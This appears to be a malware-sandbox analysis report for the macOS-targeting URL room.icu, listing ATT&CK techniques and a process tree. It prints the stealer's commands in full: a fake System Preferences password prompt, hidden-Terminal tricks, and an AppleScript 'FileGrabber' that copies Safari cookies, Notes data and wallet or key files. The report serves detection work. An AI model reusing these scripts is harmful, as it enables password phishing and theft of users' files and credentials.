hxxp://room[.]icu

Analysis

max time kernel
631s
max time network
675s
platform
macos-10.15_amd64
resource
macos-20240410-en
resource tags

arch:amd64arch:i386image:macos-20240410-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
03-06-2024 14:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://room.icu

Score

7^/10

discovery evasion execution

Malware Config

Signatures

Queries the macOS version information. 1 TTPs 2 IoCs
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
discovery

System Information Discovery
T1082

Processes:

ioc process

sh -c sw_vers
sw_vers
System Checks 1 TTPs 2 IoCs
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.
evasion

System Checks
T1497.001

Processes:

ioc process

sh -c "system_profiler SPHardwareDataType"
system_profiler SPHardwareDataType
File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur.
evasion

File Deletion
T1070.004

ioc	process
sh -c sw_vers
sw_vers

ioc	process
sh -c "system_profiler SPHardwareDataType"
system_profiler SPHardwareDataType

AppleScript 1 TTPs 8 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

Processes:

ioc	process
osascript -e "tell application \"Terminal\" to set visible of front window to false"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"875375388\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"875375388:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
osascript -e "set baseFolderPath to (path to home folder as text) & \"875375388\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"875375388:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"

Resource Forking 1 TTPs 14 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

evasion

Resource Forking

T1564.009

Processes:

ioc	process
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/hdiejectd
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -k disk3s1
"/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/Resources/DiskImages UI Agent.app/Contents/MacOS/DiskImages UI Agent" 092BA010-B2AE-4F4E-BF06-E976B1855B0E
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -p disk3s1 removable readonly
/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs -q /dev/rdisk3s1
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Helpers/ksinstall" "--install=/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz"
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 092BA010-B2AE-4F4E-BF06-E976B1855B0E
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 092BA010-B2AE-4F4E-BF06-E976B1855B0E -post-exec 4
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -p disk3s1 removable readonly
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
/usr/bin/tar -Oxjf "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz" GoogleSoftwareUpdate.bundle/Contents/Info.plist
/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs -q /dev/rdisk3s1
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -k disk3s1
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper

/bin/sh
sh -c "sudo /bin/zsh -c \"/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://room.icu\""
1⤵
PID:485

/bin/bash
sh -c "sudo /bin/zsh -c \"/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://room.icu\""
1⤵
PID:485

/usr/bin/sudo
sudo /bin/zsh -c "/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://room.icu"
1⤵
PID:485

/bin/zsh
/bin/zsh -c "/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://room.icu"
2⤵
PID:486

/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" "--simulate-outdated-no-au=Tue, 31 Dec 2099" --new-window http://room.icu
2⤵
PID:486

/usr/libexec/xpcproxy
xpcproxy com.apple.GameController.gamecontrollerd
1⤵
PID:491

/usr/libexec/gamecontrollerd
/usr/libexec/gamecontrollerd
1⤵
PID:491

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/chrome_crashpad_handler
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/chrome_crashpad_handler" "--monitor-self-annotation=ptype=crashpad-handler" "--database=/var/root/Library/Application Support/Google/Chrome/Crashpad" "--metrics-dir=/var/root/Library/Application Support/Google/Chrome" "--url=https://clients2.google.com/cr/report" "--annotation=channel=" "--annotation=plat=OS X" "--annotation=prod=Chrome_Mac" "--annotation=ver=101.0.4951.54" "--handshake-fd=5"
1⤵
PID:493

/usr/bin/profiles
/usr/bin/profiles status -type enrollment
1⤵
PID:497

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Helpers/ksinstall
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Helpers/ksinstall" "--install=/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz"
1⤵
PID:500

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/developer_id_certificate_reauthorize
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/developer_id_certificate_reauthorize" com.google.Chrome
1⤵
PID:502

/usr/bin/tar
/usr/bin/tar -Oxjf "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz" GoogleSoftwareUpdate.bundle/Contents/Info.plist
1⤵
PID:504

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (GPU).app/Contents/MacOS/Google Chrome Helper (GPU)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (GPU).app/Contents/MacOS/Google Chrome Helper (GPU)" "--type=gpu-process" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" "--gpu-preferences=UAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJgEAAAAAAAAmAQAAAAAAACIAQAAMAAAAIABAAAAAAAAiAEAAAAAAACQAQAAAAAAAJgBAAAAAAAAoAEAAAAAAACoAQAAAAAAALABAAAAAAAAuAEAAAAAAADAAQAAAAAAAMgBAAAAAAAA0AEAAAAAAADYAQAAAAAAAOABAAAAAAAA6AEAAAAAAADwAQAAAAAAAPgBAAAAAAAAAAIAAAAAAAAIAgAAAAAAABACAAAAAAAAGAIAAAAAAAAgAgAAAAAAACgCAAAAAAAAMAIAAAAAAAA4AgAAAAAAAEACAAAAAAAASAIAAAAAAABQAgAAAAAAAFgCAAAAAAAAYAIAAAAAAABoAgAAAAAAAHACAAAAAAAAeAIAAAAAAACAAgAAAAAAAIgCAAAAAAAAkAIAAAAAAACYAgAAAAAAAKACAAAAAAAAqAIAAAAAAACwAgAAAAAAALgCAAAAAAAAwAIAAAAAAADIAgAAAAAAANACAAAAAAAA2AIAAAAAAADgAgAAAAAAAOgCAAAAAAAA8AIAAAAAAAD4AgAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAHAAAAEAAAAAAAAAAAAAAACAAAABAAAAAAAAAAAAAAAAkAAAAQAAAAAAAAAAAAAAALAAAAEAAAAAAAAAAAAAAADAAAABAAAAAAAAAAAAAAAA4AAAAQAAAAAAAAAAAAAAAPAAAAEAAAAAAAAAABAAAAAAAAABAAAAAAAAAAAQAAAAcAAAAQAAAAAAAAAAEAAAAIAAAAEAAAAAAAAAABAAAACQAAABAAAAAAAAAAAQAAAAsAAAAQAAAAAAAAAAEAAAAMAAAAEAAAAAAAAAABAAAADgAAABAAAAAAAAAAAQAAAA8AAAAQAAAAAAAAAAQAAAAAAAAAEAAAAAAAAAAEAAAABwAAABAAAAAAAAAABAAAAAgAAAAQAAAAAAAAAAQAAAAJAAAAEAAAAAAAAAAEAAAACwAAABAAAAAAAAAABAAAAAwAAAAQAAAAAAAAAAQAAAAOAAAAEAAAAAAAAAAEAAAADwAAABAAAAAAAAAABwAAAAAAAAAQAAAAAAAAAAcAAAAHAAAAEAAAAAAAAAAHAAAACAAAABAAAAAAAAAABwAAAAkAAAAQAAAAAAAAAAcAAAALAAAAEAAAAAAAAAAHAAAADAAAABAAAAAAAAAABwAAAA4AAAAQAAAAAAAAAAcAAAAPAAAAEAAAAAAAAAAIAAAAAAAAABAAAAAAAAAACAAAAAcAAAAQAAAAAAAAAAgAAAAIAAAAEAAAAAAAAAAIAAAACQAAABAAAAAAAAAACAAAAAsAAAAQAAAAAAAAAAgAAAAMAAAAEAAAAAAAAAAIAAAADgAAABAAAAAAAAAACAAAAA8AAAAQAAAAAAAAAAoAAAAAAAAAEAAAAAAAAAAKAAAABwAAABAAAAAAAAAACgAAAAgAAAAQAAAAAAAAAAoAAAAJAAAAEAAAAAAAAAAKAAAACwAAABAAAAAAAAAACgAAAAwAAAAQAAAAAAAAAAoAAAAOAAAAEAAAAAAAAAAKAAAADwAAAAgAAAAAAAAACAAAAAAAAAA=" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=28"
1⤵
PID:522

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=network.mojom.NetworkService" "--lang=en-GB" "--service-sandbox-type=network" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=27"
1⤵
PID:523

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=storage.mojom.StorageService" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=42"
1⤵
PID:524

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Alerts).app/Contents/MacOS/Google Chrome Helper (Alerts)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Alerts).app/Contents/MacOS/Google Chrome Helper (Alerts)" "--type=utility" "--utility-sub-type=mac_notifications.mojom.MacNotificationProvider" "--lang=en-GB" "--service-sandbox-type=none" --message-loop-type-ui "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072"
1⤵
PID:525

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=7" "--launch-time-ticks=298844686" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=63"
1⤵
PID:526

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=6" "--launch-time-ticks=298912092" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=63"
1⤵
PID:527

/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin
/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin --productid com.google.Chrome --print-tickets --store /Library/Google/GoogleSoftwareUpdate/TicketStore/Keystone.ticketstore
1⤵
PID:529

/usr/libexec/xpcproxy
xpcproxy com.apple.SafariLaunchAgent
1⤵
PID:530

/Library/Apple/System/Library/CoreServices/SafariSupport.bundle/Contents/MacOS/SafariLaunchAgent
/Library/Apple/System/Library/CoreServices/SafariSupport.bundle/Contents/MacOS/SafariLaunchAgent
1⤵
PID:530

/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin
/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin -P com.google.Chrome --delete --user-store
1⤵
PID:532

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=8" "--launch-time-ticks=301812057" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=77"
1⤵
PID:533

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=12" "--launch-time-ticks=301985341" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=74"
1⤵
PID:534

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=10" "--launch-time-ticks=301990098" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=74"
1⤵
PID:535

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=11" "--launch-time-ticks=301993993" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=74"
1⤵
PID:536

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=79"
1⤵
PID:537

/usr/sbin/system_profiler
/usr/sbin/system_profiler SPConfigurationProfileDataType -detailLevel mini -timeout 15 -xml
1⤵
PID:538

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=101"
1⤵
PID:541

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=101"
1⤵
PID:542

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=113"
1⤵
PID:543

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=67"
1⤵
PID:544

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=19" "--launch-time-ticks=309381046" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=116"
1⤵
PID:545

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=123"
1⤵
PID:547

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:557

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:557

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=116"
1⤵
PID:558

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=116"
1⤵
PID:559

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=116"
1⤵
PID:560

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=116"
1⤵
PID:562

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
